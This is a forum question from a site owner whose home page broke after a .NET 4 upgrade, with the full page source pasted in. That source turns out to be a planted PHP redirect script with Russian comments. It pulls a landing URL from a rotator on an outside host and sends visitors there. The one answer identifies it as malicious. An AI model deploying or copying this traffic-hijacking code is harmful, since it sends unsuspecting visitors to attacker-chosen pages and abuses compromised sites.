# upgrading site to .NET 4 - strange PHP error

Tags: php, asp.net, iis-7, plesk

i want to upgrade my site from .NET 2 to 4.

1. fixed the web.config to meet 4 requirements
2. set IIS for the website to .NET 4 (through Plesk)
3. compiled all components to 4

now all the pages of the site are working except the Home Page which returns a strange PHP error: "0, 'url'=>$default_url); if ($settings['last']"

*on the below the full view source

anyone knows what seems to be the problem and how to fix it?

Many Thanks,

Assaf.

```
############################################################################
# Скрипт должен лежать в папке, прочмоденой на 777. это важно!. #
# The script must be in the folder prochmodenoy at 777. this is important!.#
############################################################################
$geturl='http://supermyadminspanels.info/rotator.php?hash=75a996ff2a8a6d666dca52a823e1cc84' # Урл экспорта актуального урла на лендинг
$timeout=120; #Время обновления (в секундах)
$default_url='http://www.google.com/robots.txt';
if (!$geturl)
exit();
#Если есть файлик данных, читаем его, иначе сливается трафик на default_url в том случае, если обноиться с экспортного урла не получится.
$tmp_settings = sys_get_temp_dir() . "/settings.json";
$settings=file_exists($tmp_settings)?unserialize(file_get_contents($tmp_settings)):array('last'=>0, 'url'=>$default_url);
if ($settings['last']<time()-$timeout)>
{
if ($settings['url']=file_get_contents($geturl))
{
$settings['last']=time();
$fp=fopen($tmp_settings, 'w');
flock($fp, LOCK_EX);
fputs($fp, serialize($settings));
flock($fp, LOCK_UN);
fclose($fp);
}
}
$url=$settings['url']?$settings['url']:$default_url;
if(substr($url, 0, 4)!='http')
$url="http://".$url."/";
header("Location: $url");
exit();
?>
```

Answer (score 0):

Content of this script looks like malicious code which trying to redirect visitors from your site to some other URL.

Think you can just move it to some other folder or name and asking your hoster or admin for security help.